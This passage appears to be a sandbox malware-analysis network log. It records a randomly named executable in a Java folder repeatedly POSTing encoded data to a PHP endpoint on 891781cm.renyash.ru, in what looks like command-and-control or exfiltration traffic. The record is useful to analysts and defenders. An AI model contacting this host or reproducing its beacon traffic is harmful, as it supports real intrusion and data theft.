                                                                                                                  Jan 1, 2025 15:03:16.668313026 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:17.025093079 CET1072OUTData Raw: 55 5f 5d 51 5a 5b 54 5a 55 5a 54 59 51 58 55 53 58 5a 5c 5c 59 54 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_]QZ[TZUZTYQXUSXZ\\YTRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<7&%=>*-?$2V:#')$/?_8>]( =,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:17.111984015 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:17.372205973 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEjQjjTMk975TbLR%2BDUazTNllsPs%2BXnS6hcPgLo4KjcAFwyFTtuxZkqNB7pJ6OkfgNDsaFut2vV6UU2xSnmn%2B3iJsyupVyh1udUhzLFN7gGdpGk8wfXDz5BplLL3ldx5rgSfWPDP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d47a87e72a5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2566&min_rtt=1962&rtt_var=1945&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=214705&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  92192.168.2.449972104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:17.496002913 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:17.853107929 CET1072OUTData Raw: 50 54 5d 57 5a 5f 54 5f 55 5a 54 59 51 52 55 5d 58 5a 5c 5f 59 56 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PT]WZ_T_UZTYQRU]XZ\_YVRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<<6 (=Z%X%[=(''%.' 3?03/>?=-4V=,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:17.946589947 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:18.205727100 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPW00OK2Ma8ANBYDLZRClyls3Z8fmktfDnPVFjaZ%2FhiDH1rQEgiYRrUqfy8MaelHeBDvbLg76lDN%2Bu50hdL69UZqKkf3WzmnN4i1WRH7BgFa91KllX%2B3LexEQR2%2FdJDf%2BtRvwVot"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d4cee29727d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8978&min_rtt=2023&rtt_var=14669&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=25319&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  93192.168.2.449978104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:18.325073957 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:18.682190895 CET1072OUTData Raw: 55 57 5d 51 5f 59 54 5e 55 5a 54 59 51 5a 55 51 58 58 5c 5e 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]Q_YT^UZTYQZUQXX\^YQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#</79_2>!=-?$B&9$X0/5$?3/>^?>3)#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:18.794529915 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:19.059082031 CET812INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2yU3vrlbdRmSfui87PaY8nqcDZmJeIFWOCfN5X%2FAgxqGp4sh6CzP057oCMQCROSki%2BsfuA%2FZO0c3ev7yPCc407SSyLGwVLPm0b%2FiN6vZRQXiasUd7%2FTWQN12OVs%2FgRzs8t%2FfrNAj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d522b53c341-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4688&min_rtt=1660&rtt_var=6679&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=56394&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  94192.168.2.449985104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:19.185750961 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:19.540599108 CET1072OUTData Raw: 55 54 58 5c 5a 58 51 5d 55 5a 54 59 51 5e 55 57 58 59 5c 5d 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTX\ZXQ]UZTYQ^UWXY\]YQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?<1Z4(=_%=(./Y''>:4'/0,8=([+X7),#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:19.629554033 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:19.903908968 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjllbSjuKIg2gm0XxbXhyi1dM2JH4yLu7XhWAhKVX%2F52iCQnJYk32SGy61tocniJd7O%2BGME8Ed1nSHtCIsUI3XQqtaybVUbWpX0wqtY3dm%2FSEgOUPiZpY%2BfNqjz9usI54wes9uy1"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d576aef32c7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2384&min_rtt=2025&rtt_var=1477&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=298080&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  95192.168.2.449991104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:20.030601978 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:20.384675980 CET1072OUTData Raw: 50 53 5d 51 5a 5b 54 58 55 5a 54 59 51 53 55 5d 58 5b 5c 55 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]QZ[TXUZTYQSU]X[\UY\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?*#822) $41-B(\32U&,+[;>,\+V*<#^!'^)


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  96192.168.2.449994104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:20.453216076 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:20.806566954 CET1796OUTData Raw: 50 52 5d 57 5a 5d 51 5f 55 5a 54 59 51 5f 55 5c 58 5d 5c 5a 59 54 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]WZ]Q_UZTYQ_U\X]\ZYTR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ])/=[ _%X=Z0&V-^310(,.]<7)#^!'^)7
                                                                                                                  Jan 1, 2025 15:03:20.941778898 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:21.190026999 CET955INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qVT4fbKSYsYwjebhSHxpRzjGLGTkLMiHLy1SndXBGWw4H0YlsOB6KVLYJD7Z4HZwvD6wOEC6W3D7VTGPmsnP9fZihEg2T7LW1PMI4M%2BYtHv8hMXdQE9K99k6v2OmZb%2B%2Bz%2F5KcGiC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d5f895a72ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4414&min_rtt=2013&rtt_var=5557&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=68796&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 50 33 02 37 5e 28 3d 2d 02 2c 11 0d 57 32 59 25 00 30 30 28 5b 25 10 25 58 2f 28 24 5d 3e 3b 28 06 26 29 22 01 20 31 2e 5b 26 26 2e 5d 04 1d 25 5b 3e 2a 2a 59 2b 11 0b 5f 2a 54 30 15 33 37 24 05 32 1a 0d 03 26 2d 22 59 20 22 01 1e 27 23 0d 0a 2b 2a 33 12 24 03 26 1f 34 00 2e 57 0d 12 22 1c 24 2d 26 0e 2a 31 09 0a 35 2f 2c 0b 27 11 2f 56 24 12 0d 0e 21 38 0f 0e 2a 3c 3c 10 21 24 3a 08 24 3a 3f 1d 21 39 29 58 36 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"P37^(=-,W2Y%00([%%X/($]>;(&)" 1.[&&.]%[>**Y+_*T037$2&-"Y "'#+*3$&4.W"$-&*15/,'/V$!8*<<!$:$:?!9)X63"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  97192.168.2.449997104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:20.574517012 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:20.931339025 CET1072OUTData Raw: 55 57 5d 56 5f 59 51 5f 55 5a 54 59 51 5e 55 57 58 59 5c 58 59 52 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]V_YQ_UZTYQ^UWXY\XYRRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ )?.#]>2:) $$V:B<\0<>0<3-=$+<=#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:21.047241926 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:21.215697050 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rOxmZ1RgnFpbn97wzocvZJd8y%2FqujMzW3kV%2FNvjisobGCyl%2Bk4MGzIvxJL9rrdq2VlyppQh7Ah%2B2zFGiyPU1MqpILwZYyRmJuwP3rCTFsOn56EMEAuliIlHQlYlZaEiFG47e0bo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d603f96729e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4821&min_rtt=1934&rtt_var=6501&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=58313&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  98192.168.2.450003104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:21.340914965 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:21.696871996 CET1072OUTData Raw: 55 50 58 57 5a 5c 54 5d 55 5a 54 59 51 58 55 5d 58 5b 5c 5f 59 5c 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UPXWZ\T]UZTYQXU]X[\_Y\RY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (Y=[!+2%*(=<'W:'4X'<-3??^,X(]+>4T=#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:21.787633896 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:21.971925020 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Whe%2Bom3JR4WUrW5OLuZjBK7hTrV4BNGqJEQ%2Fm113f4iQpV5sJnlzRZrvNP6Y96x7tqUDmzOJa3cvK8kO%2BoxUiyA2nteFYoiyRJT16Y6KILV%2FVJOJNP5LUIVISZgVx8Q4wgSvR21U"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d64e93dc335-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1888&min_rtt=1679&rtt_var=1048&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=435430&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  99192.168.2.450009104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:22.154902935 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:22.509457111 CET1072OUTData Raw: 55 53 58 54 5a 5b 54 58 55 5a 54 59 51 58 55 50 58 59 5c 5f 59 51 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: USXTZ[TXUZTYQXUPXY\_YQR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +,- .$.).$4*Q93<2Q$?_8>?<-'*,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:22.598998070 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:22.864332914 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGALunCZSNArAsmS2lrDx1T7Z6PK%2BMZGgFflp6mShhLPEQ56SMH%2FXabqBRRyAou64Yqo%2B3mT8SV3ZMMIXKmXNHbPB1kuxS0mdWsw0h%2Ba4cSwSTg6HiYAX91k39EskGl6ERrSpoEb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d69fe8a8c87-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2195&min_rtt=1918&rtt_var=1274&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=352657&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  100192.168.2.450017104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:23.262160063 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
